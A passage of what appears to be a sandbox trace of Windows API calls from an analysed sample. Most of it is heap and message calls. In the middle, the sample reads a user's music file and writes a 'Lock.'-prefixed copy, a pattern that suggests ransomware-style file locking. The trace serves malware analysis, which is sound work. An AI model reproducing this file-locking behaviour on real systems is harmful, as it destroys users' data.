hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.981] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.981] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.981] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.981] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\si3t x_6.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0252.982] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.982] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0252.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.SI3T x_6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.si3t x_6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0252.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.983] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.983] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.983] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.984] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.984] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.984] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xc6c8, lpOverlapped=0x0) returned 1 [0252.986] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.986] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc6c8) returned 0x24c7a50 [0252.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.987] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc6c8) returned 0x24c7a50 [0252.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0252.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc6c8) returned 0x24e07f0 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.991] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.995] 